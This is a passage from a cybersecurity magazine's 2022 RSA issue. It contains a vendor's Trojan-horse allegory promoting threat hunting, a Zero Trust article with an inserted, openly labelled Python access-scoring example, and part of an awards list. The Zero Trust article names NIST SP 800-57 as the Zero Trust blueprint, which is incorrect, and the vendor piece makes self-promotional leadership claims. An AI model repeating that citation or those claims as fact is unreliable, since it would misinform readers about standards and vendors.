There is a large gate encircling the city that provides an initial line of defense and protection for the people
and goods inside.
Outside the gate lies the unknown, filled with malicious threat groups trying to lay siege to the city,
attempting to capture all that they can whether that is protected information, riches, or even disrupting
normal operations to the point where the city is hemorrhaging money. All they need to do is find a single
way in.
As commander of the army of Troy, how would you go about defending the city?
Defending Troy with a Static Security Operations Center
You decide to place sentries atop the city wall who can see for miles it seems. Your instructions are clear
that they are to report back to you with anything and everything they see. You sit back and wait and
almost immediately a messenger knocks on the door. They enter and tell you that Jane was planting
flowers in the city garden.
Alright, that’s great, but not quite what you had in mind.
As the messenger is leaving, another knock comes at the door. Another messenger to tell you that
someone is approaching the wall on horseback. Great. This is the kind of info you were looking for. You
tell the messenger to go find out more and report back.
Before they can leave, there is another knock, and when the door opens, you catch a glance of a line of
messengers that stretches down the hall and there are more coming. Each one delivers a piece of
information to you, with most reports being about the daily ongoings within the city. Someone is baking
bread, the blacksmith is fashioning horseshoes, and another person is delivering milk.
There are so many pieces of data that are coming in that you are completely overwhelmed with trying to
figure out what is relevant to your risk profile as a threat and what is just normal daily activity.
Thus is born the Static Security Operations Center. A place where all of the network data is funneled with
no clear picture of what is going on. Who was the person on the horse? Did they keep advancing or turn
and go a different way? Were they carrying anything that could be considered a threat? You just have to
find that one messenger and hope that they didn’t get sidetracked or tasked with something else.
Organizations that stood up a static SOC quickly became overloaded with data and no context around
this data. So, you decide to tune your instructions to the messengers and tell them to only report on what
is going on outside the walls of the city.
Defending Troy with a Context-Driven Security Operations Center
The next day, the line of messengers is much shorter. That’s a good start, at least. Until they begin
entering and reporting their observations.
Each one has a seemingly frightening message. There were groups that were beginning to assemble
outside the city wall. Each group had a clear leader and it looked like they were planning something.
Each leader was talking with their group, pointing to the city, looking down at a piece of parchment,
perhaps a map, and drawing things in the dirt.
As the day goes on, the messengers keep coming, not in the same quantities, but all seeming to give the
exact same report. You hear the same thing over and over and over again with no more information
added to help you determine what, if anything, you should do about these groups gathering outside the
city.
This is where we see the emergence of security tools and platforms that help provide context around all
the data that was flooding in. This did help organizations begin to paint a better picture - maybe there is
something going on that we need to pay attention to. Just like your messengers, you have alerts as far
as the eye can see. And now, you’re beginning to worry that they are planning something, or even worse,
something already got by the defenses and they are just waiting for a signal.
It makes a lot of sense to begin watching for suspicious activity within the walls again, not all activity, just
anything that looks out of the ordinary. And probably time to equip the sentries with some armor and
weapons to help defend against a possible breach.
Defending Troy with Managed Detection & Response (MDR)
The next day you give the new instructions to your sentries, and see to it that the supplies are delivered
to help protect Troy. Messengers begin to arrive and let you know that sometime overnight, there was a
delivery of wood and nails to the groups that were gathering off in the distance outside the city. Unsure
of what the materials are for or who delivered them, it looks like the groups are beginning to work together.
There is a clear leader among the different divisions, going back and forth between them and giving
directions and orders.
Occasionally, a few individuals on horseback ride closer to the wall and the sentries fire arrows in
response to deter the threat. The messengers are reporting this activity every time an arrow is fired. It
looks like everything is working. You are successfully defending the city and keeping the threats out.
Feeling rather confident in your plan, you retire for the evening and look forward to the next day.
Hopefully, the lack of ability to bypass the perimeter security will frustrate the groups outside the wall,
and eventually, they will disperse.
Managed Detection and Response has been the status quo for the cyber security industry for quite some
time now. There was a time, though, when it seemed like MDR was on the way out and Extended
Detection and Response (XDR) would take over because of the ability to paint a clearer picture of what
was going on outside your gates.
Imagine this same process going on for years. The same events get reported over and over again. There
is more wood and nails being delivered each day. A few individuals try to breach the gates but are
deterred by your defenses. On and on it goes. This is what we call event fatigue and what we observed
is that eventually, your team gets tired of paying attention to the details. On the outside, the city looks
completely secure and there is no need to worry.
Great. Until one morning, the groups outside are gone. Just like that, they have all disappeared and the
only thing that remains is a wooden horse parked just outside of the gate with a note that reads: “A gift
for you.”
What do you do?
Defending Troy with Dynamic Threat Hunting (DTH)
At this point, we all know the story. The city rejoices and the gift is brought inside where the unsuspecting
city of Troy falls to the adversary.
Wouldn’t it have been nice to know that the local sawmill workers have been working overtime for the
last 10 years, milling more wood than the city needed? Or that the blacksmith spent his extra time crafting
millions of nails and tools?
Wouldn’t it have been great to understand that during the dark of night, there were meetings going on
between people inside the city and the leaders of the external threat groups? Together, they were coming
up with a creative plan to deceive the sentries and evade being noticed?
Not every breach has an inside threat component to it, but sometimes, people, processes, and technology
lend themselves to being an easy target. Like assigning everyone local admin rights to their individual
computer so that when a link is clicked in a phishing email, the attacker now has absolute control over
that machine.
Dynamic Threat Hunting is when you pair the wire-speed of AI and ML with the creative understanding
of human Threat Hunters to provide an intelligent, context-aware, and just-in-time security operation that
not only collects and analyzes the data but actually thinks like attackers and looks beyond the data, alerts,
and events.
To the trained Threat Hunter, a simple daily event can be the key to turning a scouting session into a
deep hunt. Pairing that with the speed of machines processing messages and telemetry about what is
going on in the world and within your network, a crystal clear picture can be uncovered. From there, you
have the ability to cut off the attack before it happens and keep your organization secure.
Defending Troy, like protecting your organization, is a monumental task, and no quantity of tools or
platforms alone will get the job done. Likewise, you can’t just throw a bunch of bodies at it to solve the
problem either. It takes the two working in unison to successfully perform Dynamic Threat Hunting.
It is no easy task to stand up a Dynamic Threat Hunting team with the ability to see through all the noise
and find the needle in the haystack, but it’s what Milton Security has been working towards for the last
15 years. We were the first Dynamic Threat Hunting provider, and after all this time, we’re still the leader.
About the Author
James “Jim” McMurry is the Founder and CEO of Milton Security,
the global leader in Dynamic Threat Hunting. With over 30 years
of combined experience in Security, Information Technology,
Telecommunication, Networking, Management, and Software
development, James founded Milton Security with the vision of
bringing exceptional network security within reach for all
organizations.
Prior to launching Milton Security in 2007, he worked with a broad
spectrum of companies ranging from startups to Fortune 1000 in
and around the Bay area. He also proudly served as a member of
the U.S. Coast Guard aboard the USCGC Taney and USCGC
Morgenthau.
McMurry has a passion for Bourbon and a deep hatred of beets. He openly shares both with everyone.
For more information on Milton Security, please visit https://miltonsecurity.com; for more about James,
follow him on LinkedIn, Instagram, and Twitter.
Zero Trust: Security Model for A Fluid
Perimeter
By Debanjali Ghosh, Technical Evangelist, ManageEngine
The concept of a network being fully enclosed within a building, and therefore easier to defend, is gone.
Recent trends in cloud computing, BYOD, IoT and remote work have forced organizations to rapidly
adjust their security strategies to accommodate the new threat landscape. External attacks and malicious
insider threats emerge one after another, and traditional security perimeters fail to fulfil the urgent need
for comprehensive network security.
With remote work comes a string of considerations that require security professionals to change
their approach towards perimeter-based security models. Everyone within the corporate perimeter is
trusted by default in a castle-and-moat approach. Therefore, once the attacker gains access to the
network, they are free to move around, initiate ransomware attacks, and exfiltrate sensitive data onto
their systems. This is where Zero Trust emerges. The Zero Trust security model considers all resources
with suspicion, irrespective of the location. All inbound traffic and entities undergo strict authentication
before access is granted. In a Zero Trust security model, the fundamental basis of "trust" is based on
fine-grained access control and contextual authentication.
NIST, the National Institute of Standards and Technology, is among the most widely recognized federal
agencies for cybersecurity guidance. NIST's Special Publication 800-57 provides organizations with a
detailed blueprint for implementing Zero Trust architecture to tackle organizational security risks. Zero
Trust is a journey involving assessing, planning, and constructing the new generation network security
architecture gradually. This whitepaper provides an overview of the fundamentals of Zero Trust and the
components of migration methodology. Furthermore, it discusses the deployment scenarios of Zero Trust
in detail, where risk-based adaptive authentication and policy-driven algorithm optimizations are crucial
constituents to reduce implicit trust zones.
What is causing the perimeter to vanish?
As the organizational network expands, the number of devices located outside its perimeter increases.
Organizations are increasingly migrating to the cloud and adopting software-as-a-service (SaaS)
products for business continuity, cost efficiencies and digital transformation initiatives, making it
extremely difficult to manage endpoint security and monitor all user activity. The network perimeter
protected the on-premise data centers and corporate resources, which are now easily accessible through
unmonitored private networks. Hybrid data models where data is stored on-premises partially and
partially on the cloud make it difficult to enforce access controls around the network boundary. The rise
in the number of IoT devices has resulted in poor security management.
Challenges associated with perimeter-based security models
The insider risk: When an insider is planning a malicious activity, there is no need to intrude on
the trusted network. The traditional perimeter-based model is not sufficient to deal with this
type of risk. Insider threats are difficult to defend against, as insiders have the added advantage of
being familiar with the organization's security structure. The level of visibility and granularity
required to mitigate insider threats cannot be achieved through traditional methods.
Policy gaps: Certain business-critical data gets stored in two different systems with different
levels of access policy, and such instances often go unnoticed by security teams. External
attackers exploit these gaps between the different policies or enforcement that apply to the same
asset. They leverage outdated policies or flawed authentication methods to break the perimeter.
Vulnerable Endpoints: Vulnerable endpoints or software that contain security flaws can be
exploited by attackers. Endpoints should be monitored and updated regularly. Every device
connected to a private network can be a potential threat surface for attackers to execute code
and exploit vulnerabilities. These threat surfaces are sometimes used to gain access to business-
critical resources or hold hostage and steal sensitive information. This can be a security nightmare
for the enterprise.
Dynamic Workloads: Most workloads are now either deployed on virtual machines or container
models, or cloud platforms. Hybrid cloud models allow workloads to be on either side of the
network boundary while allowing them to move around dynamically between on-premise and
cloud data centers. In such cases, obtaining visibility over workloads and creating relevant access
policies with the traditional network perimeter model can be challenging.
The solution is Zero Trust
Organizations worldwide are embracing digital transformation to ensure business continuity, and most
times, security is neglected. Cybercrime is now highly organized, and bad actors are sophisticated
enough to deploy APTs and move laterally within an organization's network. Traditional approaches are
failing to protect organizations in the new normal of remote work and industry-wide cloud
adoption. Securing modern enterprises from today's threat landscape, which aligns with the cloud
environment, requires a shared responsibility model.
A Zero Trust model can fulfil this cybersecurity need by deploying security controls that assume the
network is already compromised. Legacy network perimeter security and visibility solutions that keep
attackers out are no longer practical or robust enough. Implicit trust is no longer effective, and
depending on basic IAM solutions alone is no longer practical. Zero Trust employs the least-privilege
principle and strong authentication methods to enforce access controls and enhance the network's
granular visibility.
A well-executed Zero Trust strategy is based on the principle of access, limit and monitoring. By enabling
organizations to precisely manage identities and monitor user activity, especially those with elevated
privileges, Zero Trust can act as the overarching system of an organization's security framework.
With IoT devices eavesdropping and home Wi-Fi routers not configured for WPA2, a remote workforce
brings significant cyber risks. The productivity and security of employees working remotely can no longer
be ensured or controlled. Enterprise-owned devices are traditionally managed, patched, and kept up to
date with security tools and policies. Even if Zero Trust security can't force employees working at home
to maintain basic cyber hygiene, it can prevent a security breach because it fundamentally enforces
access controls at every segment within the network.
The only solution to this complex cyber threat landscape is the new-generation Zero Trust security
framework, which offers granular visibility and continuous monitoring of the network. Moreover, it
establishes trust that is dynamic, contextual and risk-based, and grants access requests only if certain
access policy parameters are met.
Gartner's CARTA (Continuous Adaptive Risk and Trust Assessment) takes Zero Trust further by introducing
continuous adaptation beyond the basic allow-or-deny model to provide contextually relevant access. With
context as king, CARTA's additional security measures reduce breach risk and improve containment if a
hacker gains access to the network.
The continuous improvement of Zero Trust in theory and practice has moved beyond micro-segmentation
and the software-defined perimeter and evolved into adaptive, identity-based security solutions.
Steps to building Zero Trust for a perimeter-based network
For an organization looking to deploy Zero Trust, a survey of assets, subjects, data flows, and workflows
is a good place to start. This gives the enterprise detailed information on the current state of its
assets before any new business processes are introduced. The implementation of Zero Trust architecture
(ZTA) can be broken down into several steps:
Identify enterprise subjects: The policy engine must know all enterprise subjects, especially privileged
users. The architecture is built inclusively, giving IT administrators the flexibility to perform
business-critical tasks.
Identify enterprise-owned assets: A key component of ZTA is identifying and monitoring both
enterprise-owned and non-enterprise-owned devices on the enterprise network. Hardware components,
virtual assets, and BYOD assets are continuously logged and monitored so that the policy engine
has detailed information when making resource access decisions.
Identify key processes: The enterprise identifies and ranks business processes by their perceived
importance. Low-risk business processes are transitioned during the initial migration, whereas mission-
critical processes are migrated later. In a perimeter-based architecture, it is often difficult to make
enterprise resources available to remote employees. In such cases, transitioning cloud-based resources
to Zero Trust architecture benefits remote employees in both availability and security. The policy
enforcement points ensure that every subject request satisfies the access policies before access to a
resource is granted.
Create policies for the Zero Trust environment: The enterprise values subjects, workflows, and business
processes according to the risk associated with them. After this point, IT administrators determine which
variation of the trust algorithm to follow so that all enterprise policies are comprehensive and
effective.
Identify solutions: The enterprise architects decide on the deployment model and the solution
components based on key business processes and their valuation.
Initial deployment and monitoring: During the initial deployment, the Zero Trust model can operate in
reporting-only mode to ensure that the key processes and their related policies are operative and
comprehensive. In this mode, access is granted for most requests, and these sessions are logged and
continuously monitored to establish baseline patterns for the workflows. With a solid understanding
of the baseline behavior of every asset and subject in the enterprise, it is easier for security teams to spot
an anomaly and prevent attacks.
Expand the Zero Trust architecture: Once the enterprise enters a steady operational phase, it can
expand the architecture to include new devices, changes in network infrastructure, and replacement of
legacy systems. Throughout, the network, its subjects, and its assets continue to be monitored, and
policies are refined to improve the model's efficiency.
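The steps above, together with the earlier point that trust is established dynamically from contextual risk, can be made concrete as a small policy decision point. The following is an added example written for this article, not code from the author or from ManageEngine: it keeps an inventory of subjects and assets, scores each access request from identity, device posture, network location and deviation from a learned behavioral baseline, compares the score against a per-process risk tier, and runs either in reporting-only mode (the policy's would-be denials are logged but access is still granted, so baselines can be learned) or in enforce mode. The weights, thresholds, tier scale, subject and asset names and sample requests are all constructed for illustration, and every configuration change and decision is written to an audit log, as the article recommends for the policy engine and policy administrator.

```python
from dataclasses import dataclass
from enum import Enum

class Mode(Enum):
    REPORT_ONLY = "report-only"  # log what the policy would deny, but still grant access
    ENFORCE = "enforce"          # deny requests whose contextual risk exceeds the threshold

@dataclass(frozen=True)
class Subject:
    user: str
    privileged: bool
    mfa_verified: bool

@dataclass(frozen=True)
class Asset:
    device_id: str
    enterprise_owned: bool
    patched: bool
    managed_agent: bool  # endpoint agent present and reporting device posture

@dataclass(frozen=True)
class Request:
    subject: str
    device: str
    resource: str
    tier: int                  # constructed scale: 1 = low-risk process, 3 = mission-critical
    network: str               # "corp", "home" or "unknown"
    baseline_deviation: float  # 0.0 = matches the learned baseline, 1.0 = fully anomalous

@dataclass(frozen=True)
class Decision:
    allowed: bool        # what the enforcement point does in the current mode
    policy_allows: bool  # what the policy itself says, independent of mode
    risk: float
    reasons: tuple

# Constructed weights and thresholds (hypothetical values, not taken from any product).
WEIGHTS = {"no_mfa": 0.40, "unmanaged": 0.25, "unpatched": 0.15,
           "byod": 0.10, "off_corp_network": 0.10}
BEHAVIOUR_WEIGHT = 0.50      # contribution of deviation from the learned baseline
PRIVILEGED_MULTIPLIER = 1.5  # privileged identities are held to a tighter bound
MAX_RISK_BY_TIER = {1: 0.80, 2: 0.50, 3: 0.25}

class PolicyEngine:
    def __init__(self, subjects, assets, mode=Mode.REPORT_ONLY):
        self.subjects = {s.user: s for s in subjects}
        self.assets = {a.device_id: a for a in assets}
        self.mode = mode
        self.audit_log = []  # configuration changes and every decision, kept for audit

    def set_mode(self, mode, changed_by):
        # A configuration change is recorded before it takes effect.
        self.audit_log.append(("config", changed_by, f"{self.mode.value} -> {mode.value}"))
        self.mode = mode

    def score(self, req):
        # Returns (risk in [0, 1], reasons) from identity, device posture and context.
        subject, asset = self.subjects.get(req.subject), self.assets.get(req.device)
        if subject is None or asset is None:
            return 1.0, ("unknown subject or asset",)  # unknown entities get no trust
        checks = {"no_mfa": not subject.mfa_verified, "unmanaged": not asset.managed_agent,
                  "unpatched": not asset.patched, "byod": not asset.enterprise_owned,
                  "off_corp_network": req.network != "corp"}
        reasons = [name for name, failed in checks.items() if failed]
        risk = sum(WEIGHTS[name] for name in reasons)
        if req.baseline_deviation > 0:
            risk += req.baseline_deviation * BEHAVIOUR_WEIGHT
            reasons.append("behaviour_anomaly")
        if subject.privileged:
            risk *= PRIVILEGED_MULTIPLIER
        return round(min(risk, 1.0), 3), tuple(reasons)

    def evaluate(self, req):
        risk, reasons = self.score(req)
        policy_allows = risk <= MAX_RISK_BY_TIER[req.tier]
        allowed = policy_allows or self.mode is Mode.REPORT_ONLY
        self.audit_log.append(("decision", req.subject, req.resource, policy_allows, risk))
        return Decision(allowed, policy_allows, risk, reasons)

# Constructed inventory and sample requests.
SUBJECTS = [Subject("alice", privileged=False, mfa_verified=True),
            Subject("bob", privileged=True, mfa_verified=True),
            Subject("carol", privileged=False, mfa_verified=False)]
ASSETS = [Asset("lap-001", enterprise_owned=True, patched=True, managed_agent=True),
          Asset("byod-777", enterprise_owned=False, patched=False, managed_agent=False)]
REQUESTS = [Request("alice", "lap-001", "hr-portal", 2, "corp", 0.0),
            Request("carol", "byod-777", "crm", 1, "home", 0.1),
            Request("bob", "lap-001", "domain-controller", 3, "home", 0.6),
            Request("bob", "lap-001", "domain-controller", 3, "corp", 0.0)]

def run(mode):
    # Evaluates the sample requests in the given mode; returns (engine, decisions).
    engine = PolicyEngine(SUBJECTS, ASSETS, mode)
    return engine, [engine.evaluate(r) for r in REQUESTS]

if __name__ == "__main__":
    for mode in (Mode.REPORT_ONLY, Mode.ENFORCE):
        print(f"--- {mode.value} ---")
        for req, d in zip(REQUESTS, run(mode)[1]):
            verdict = "ALLOW" if d.allowed else "DENY"
            print(f"{req.subject:6} {req.resource:18} risk={d.risk:.2f} -> {verdict} {d.reasons}")
```

In report-only mode all four requests go through, but the audit log shows that carol's unmanaged, unpatched BYOD device without MFA and bob's anomalous off-network session against a mission-critical resource would both have been denied; that is the "baseline" review the article describes before switching to enforce mode, where those two requests are blocked and the other two still pass. A request from a subject or device that is not in the inventory scores maximum risk, which is what "assume the network is already compromised" means in practice.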
Shortcomings of the Zero Trust security model
Eliminating cybersecurity risk entirely is a far-fetched expectation. Although enterprises can reduce the
overall risk of cyberattacks by properly implementing and continuously monitoring the Zero Trust security
model, the architecture faces challenges of its own, and organizations need to learn to overcome them. When
Zero Trust architecture is customized piecemeal, legacy solutions can leave policy gaps
that bad actors exploit as loopholes to gain control of the network.
Cybersecurity professionals must be extensively trained to configure and monitor the policy engine and
policy administrator properly, because these components are responsible for making access-related
decisions. Any change to these components' configuration must be logged and audited to ensure that
the decision-making process is sound. Enterprise resources cannot interact with each other without the
policy administrator's approval, so DoS attacks that block the communication path or the traffic from many
users to the policy enforcement points can disrupt enterprise operations.
Enterprises that use security analytics to monitor and analyze network traffic store the metadata for
forensics and for building contextual policies. This data becomes a target for attackers, as insight into
the enterprise architecture can be a great advantage for further attacks. Zero Trust architecture depends
heavily on artificial intelligence and other software-based agents to improve the enterprise's security
posture. However, authenticating these components is an underlying issue: an attacker who gains
access to a software agent's credentials could launch a botnet attack to infect other systems.
In the current landscape, Zero Trust is the most comprehensive approach to complementing the perimeter-
based security architecture. The key principle of Zero Trust is that no user, device,
application, or service is trusted by default, irrespective of its location. This technology is expected
to see widespread adoption in the current year because it embodies the security principles required to
combat the increasing number of sophisticated attacks. All network-related entities must be contextually
authenticated on a continual basis to ensure that any deviation from their behavioral patterns is spotted
before a breach happens. Zero Trust fulfills the demands of a unified remote working experience through
hyper-converged technology and infrastructure. Looking past pandemic-forced remote work towards a
hybrid workplace, Zero Trust, with its "built-in security", is a must-have project in 2022.
About the Author
Debanjali Ghosh, a technical evangelist at ManageEngine,
helps IT leaders and global enterprises to take on the
evolving cybersecurity challenges. She is a sought speaker
on the key IAM and cybersecurity trends in international
platforms. Her research studies on the topics of Zero Trust,
advanced authentication, and building an enterprise-grade
cybersecurity framework have received much acclaim
internationally. Her insight and advice on leveraging the
latest technology for better IAM and cybersecurity have
helped many Fortune 500 companies.
Debanjali can be reached online at debanjali@manageengine.com and at our company
website, www.manageengine.com
Welcome to the Cyber Defense Global InfoSec Awards for 2022
As we go to press on this annual RSAC issue of Cyber Defense Magazine, on
behalf of Cyber Defense Media Group, we celebrate our strong relationship with
the RSA organization. Among the many valuable services and affiliations we
enjoy, the RSA connection is one of our most important.
It is with great pleasure that we dedicate this RSA/June 2022 issue of Cyber
Defense Magazine to our support and participation in the RSA Conference set
for June 6-9, 2022, in San Francisco.
We have worked diligently at our end to produce one of the largest and most
comprehensive issues of Cyber Defense Magazine in our 10-year history. With
nearly 50 articles from cyber security professionals, many of them planning to
attend RSAC 2022, we continue to grow in distribution and actionable
intelligence for our contributors and readers. We continue to monitor closely
and respond to the needs of our audience.
Accordingly, the scope of CDMG’s activities has grown into many media
endeavors to meet these growing needs. We offer Cyber Defense Awards;
Cyber Defense Conferences; Cyber Defense Professionals (job postings);
Cyber Defense TV, Radio, and Webinars; and Cyber Defense Ventures
(partnering with investors). The full list, with links, can be accessed at:
https://www.cyberdefensemagazine.com/cyber-defense-media-group-10-year-anniversary-daily-celebration-in-2022/
Cybersecurity is on the front line of the ongoing protection of our economy and
critical infrastructure. It’s no surprise that there are now hundreds of thousands
of career openings and unlimited opportunities for those who wish to make a
positive impact on today's digital world. Cyber Defense Media Group is
dedicated to providing the information and tools for professionals to create
resilient and sustainable cyber systems.
Congratulations to all our winners!
Gary S. Miliefsky, CEO
Cyber Defense Media Group
Publisher, Cyber Defense Magazine
Access Control
Axis Security Best Product Access Control
Account Takeover Protection
D4t4 Solutions Most Comprehensive Account Takeover Protection
XTN Cognitive Security Editor's Choice Account Takeover Protection
Active Directory Security Solution
CionSystems Most Comprehensive Active Directory Security Solution
Advanced Persistent Threat (APT) Detection and Response
Datto Hot Company Advanced Persistent Threat (APT) Detection and Response
SECUINFRA GmbH Cutting Edge Advanced Persistent Threat (APT) Detection and Response
IronNet Editor's Choice Advanced Persistent Threat (APT) Detection and Response
Adversarial ML Threat Mitigation
Adversa AI Next Gen Adversarial ML Threat Mitigation
Bosch AIShield Market Leader Adversarial ML Threat Mitigation
Anti-Malware
Microsoft Hot Company Anti-Malware
Cythereal Most Innovative Anti-Malware
Anti-Phishing
Donuts Inc. Publisher's Choice Anti-phishing
Egress Most Comprehensive Anti-phishing
INKY Technology Best Product Anti-phishing
Inspired eLearning Most Innovative Anti-phishing
Pixm Cutting Edge Anti-phishing
Security Mentor, Inc. Editor's Choice Anti-phishing
SlashNext Next Gen Anti-phishing
Thrive Hot Company Anti-phishing
Valimail Market Leader Anti-phishing
Anti-Virus
Microsoft Publisher's Choice Anti-Virus
API Security
Noname Security Most Innovative API Security
Salt Security Next Gen API Security
Application Security
Data Theorem Cutting Edge Application Security
Cycode Most Comprehensive Application Security
Enso Security Publisher's Choice Application Security
HUMAN Security, Inc. Market Leader Application Security
Imperva Most Innovative Application Security
Reflectiz Editor's Choice Application Security
ReversingLabs Best Product Application Security
Security Compass Hot Company Application Security
VMware Best Solution Application Security
Application Vulnerability Detection
K2 Cyber Security Hot Company Application Vulnerability Detection
Artificial Intelligence and Machine Learning
Deloitte Publisher's Choice Artificial Intelligence and Machine Learning
Bosch AIShield Market Leader Artificial Intelligence and Machine Learning
Silobreaker Most Innovative Artificial Intelligence and Machine Learning
Bank of America Editor's Choice Artificial Intelligence and Machine Learning
LogicHub Most Comprehensive Artificial Intelligence and Machine Learning
Attack Surface Management
Bishop Fox Hot Company Attack Surface Management
Cyble Most Comprehensive Attack Surface Management
CyCognito Publisher's Choice Attack Surface Management
Data Theorem Market Leader Attack Surface Management
Deloitte Most Innovative Attack Surface Management
Noetic Cyber Cutting Edge Attack Surface Management
Praetorian Editor's Choice Attack Surface Management
Red Piranha Limited Next Gen Attack Surface Management
Lucidum Hot Company Attack Surface Management
Authentication
Bank of America Market Leader Authentication
Authorization for Cloud Security
Authomize Cutting Edge Authorization for Cloud Security
Breach & Attack Simulation
Cymulate Most Comprehensive Breach & Attack Simulation
Praetorian Publisher's Choice Breach & Attack Simulation
StrikeReady Market Leader Breach & Attack Simulation
Keysight Technologies Most Innovative Breach & Attack Simulation
Picus Security Cutting Edge Breach & Attack Simulation
Radiflow Editor's Choice Breach & Attack Simulation
Browser Isolation
Ericom Software Next Gen Browser Isolation
Minerva Labs Most Comprehensive Browser Isolation
Perception Point Market Leader Browser Isolation
Central Log Management
Fluency Security Market Leader Central Log Management
Graylog, Inc. Most Innovative Central Log Management
CIEM: IDEntitleX
Attivo Networks Cutting Edge CIEM: IDEntitleX
Cloud Access Security Broker (CASB)
Grip Security Editor's Choice Cloud Access Security Broker (CASB)
Lookout Next Gen Cloud Access Security Broker (CASB)
Cloud Backup
Konica Minolta Business Solutions U.S.A., Inc. Most Innovative Cloud Backup
Cloud Infrastructure Entitlement Management (CIEM)
Ermetic Ltd Hot Company Cloud Infrastructure Entitlement Management (CIEM)
Cloud MDR Provider
Trustwave Best Solution Cloud MDR Provider
Cloud Native Security
BigID Hot Company Cloud Native Security
Xmirror Security Publisher's Choice Cloud Native Security
Cloud Obfuscation
Conceal Next Gen Cloud Obfuscation
Dispersive Holdings, Inc. Editor's Choice Cloud Obfuscation
Cloud Security
Anitian Most Comprehensive Cloud Security
Confluera Inc. Publisher's Choice Cloud Security
Deloitte Market Leader Cloud Security
Iboss Most Innovative Cloud Security
Imperva Cutting Edge Cloud Security
Skyhigh Security Editor's Choice Cloud Security
Netskope Next Gen Cloud Security
Noname Security Hot Company Cloud Security
ThreatModeler Software Inc. Best Product Cloud Security
Valtix, Inc Most Comprehensive Cloud Security
Microsoft Market Leader Cloud Security
Data Theorem Most Innovative Cloud Security
Fastly Next Gen Cloud Security
Ntirety Next Gen Cloud Security
Cloud Security and Monitoring
ManageEngine, a division of Zoho Corporation Cutting Edge Cloud Security and Monitoring
Cloud Security Automation
Anitian Publisher's Choice Cloud Security Automation
CoreStack Market Leader Cloud Security Automation
Wing Security Most Innovative Cloud Security Automation
Cloud Security Monitoring
Sumo Logic Best Solution Cloud Security Monitoring
Cloud Security Posture Management (CSPM)
Anitian Most Comprehensive Cloud Security Posture Management (CSPM)
Ermetic Ltd Publisher's Choice Cloud Security Posture Management (CSPM)
Suridata Market Leader Cloud Security Posture Management (CSPM)
Cloud Workload Protection
Colortokens Most Innovative Cloud Workload Protection
Confluera Cutting Edge Cloud Workload Protection
Intelligent Waves LLC Editor's Choice Cloud Workload Protection
Cloud-based Operational Technology (OT) & Internet of Things (IoT) Cybersecurity
Nozomi Networks Next Gen Cloud-based Operational Technology (OT) & Internet of Things (IoT) Cybersecurity
Company of the Year
KnowBe4 Publisher's Choice Company of the Year
Compliance
A-LIGN Best Product Compliance
Anitian Most Comprehensive Compliance
Atlantic.Net Publisher's Choice Compliance
Hyperproof Market Leader Compliance
PCI Pal Most Innovative Compliance
Reciprocity Cutting Edge Compliance
CyberSaint Security Next Gen Compliance
Compliance Automation
Allgress, Inc. Editor's Choice Compliance Automation
Anitian Next Gen Compliance Automation
CoreStack Hot Company Compliance Automation
Secureframe Best Product Compliance Automation
Onward Security Most Innovative Compliance Automation
Computer Forensics
Exterro, Inc Most Comprehensive Computer Forensics
Confidential Computing
Fortanix Publisher's Choice Confidential Computing
Container Security
Confluera Market Leader Container Security
Skyhigh Security Most Innovative Container Security
NeuVector Cutting Edge Container Security
Content Disarm and Reconstruction (CDR)
Votiro Publisher's Choice Content Disarm and Reconstruction (CDR)
Forcepoint Editor's Choice Content Disarm and Reconstruction (CDR)
Resec Next Gen Content Disarm and Reconstruction (CDR)
Continuous Compromise Assessment
Lumu Technologies Hot Company Continuous Compromise Assessment
Continuous Controls Monitoring Platform
Noetic Cyber Best Product Continuous Controls Monitoring Platform
CyberSaint Security Next Gen Continuous Controls Monitoring Platform
Critical Infrastructure Protection
BedRock Systems Inc. Critical Infrastructure Protection
OPSWAT, Inc Publisher's Choice Critical Infrastructure Protection
Shift5 Market Leader Critical Infrastructure Protection
TXOne Networks Most Innovative Critical Infrastructure Protection
Cyber Discovery
Ground Labs Next Gen Cyber Discovery
Cyber Insurance
Corvus Insurance Hot Company Cyber Insurance
Cowbell Cyber Best Product Cyber Insurance
Cyber Security as a Service
Deloitte Market Leader Cyber Security as a Service
Cyber Security Awareness
SBER Hot Company Cyber Security Awareness
Terranova Security Market Leader Cyber Security Awareness
Cyber Security Book
Mandiant Market Leader Cyber Security Book
SecurityMetrics Most Innovative Cybersecurity Book
Cyber Security Training
Deloitte Editor's Choice Cyber Security Training
Cybersecurity - Healthcare Practices
Alexio Corporation Cutting Edge Cybersecurity - Healthcare Practices
Cybersecurity Analytics
Cyble Next Gen Cybersecurity Analytics
StrikeReady Most Innovative Cybersecurity Analytics
CyberSaint Security Next Gen Cybersecurity Analytics
Cybersecurity Artificial Intelligence
Axiado Corporation Most Comprehensive Cybersecurity Artificial Intelligence
Bosch AIShield Publisher's Choice Cybersecurity Artificial Intelligence
CUJO AI Market Leader Cybersecurity Artificial Intelligence
Cyble Most Innovative Cybersecurity Artificial Intelligence
Darktrace Holdings, LTD Cutting Edge Cybersecurity Artificial Intelligence
Flexxon Pte Ltd Editor's Choice Cybersecurity Artificial Intelligence
Pixm Next Gen Cybersecurity Artificial Intelligence
ReaQta Hot Company Cybersecurity Artificial Intelligence
SlashNext Best Product Cybersecurity Artificial Intelligence
StrikeReady Most Comprehensive Cybersecurity Artificial Intelligence
Vectra AI Publisher's Choice Cybersecurity Artificial Intelligence
Cybersecurity Company of the Year
Bugcrowd Cutting Edge Cybersecurity Company of the Year
Sophos Editor's Choice Cybersecurity Company of the Year
Cybersecurity Content
ConnectWise Next Gen Cybersecurity Content
Inspired eLearning Hot Company Cybersecurity Content
Cybersecurity Education - For Small Businesses (SMBs)
ConnectWise Best Solution Cybersecurity Education - For Small Businesses (SMBs)
Cybersecurity Education for SMBs
Inspired eLearning Publisher's Choice Cybersecurity Education for SMBs
Cybersecurity Education for Enterprises
Tata Consultancy Services Limited Most Innovative Cybersecurity Education for Enterprises
Bank of America Publisher's Choice Cybersecurity Education for Enterprises
Cybersecurity Internet of Things (IoT)
Palo Alto Networks Best Product Cybersecurity Internet of Things (IoT)
Cybellum Cutting Edge Cybersecurity Internet of Things (IoT)
Cybersecurity Product Engineering Services
Sacumen Hot Company Cybersecurity Product Engineering Services
Cybersecurity Research
Anomali Most Comprehensive Cybersecurity Research
Forescout Publisher's Choice Cybersecurity Research
NTT Application Security Market Leader Cybersecurity Research
Microsoft Most Innovative Cybersecurity Research
WatchGuard Technologies Cutting Edge Cybersecurity Research
Cybersecurity Service Provider Auditor of the Year
CSIOS Corporation Editor's Choice Cybersecurity Service Provider Auditor of the Year
Cybersecurity Service Provider of the Year
CSIOS Corporation Next Gen Cybersecurity Service Provider of the Year
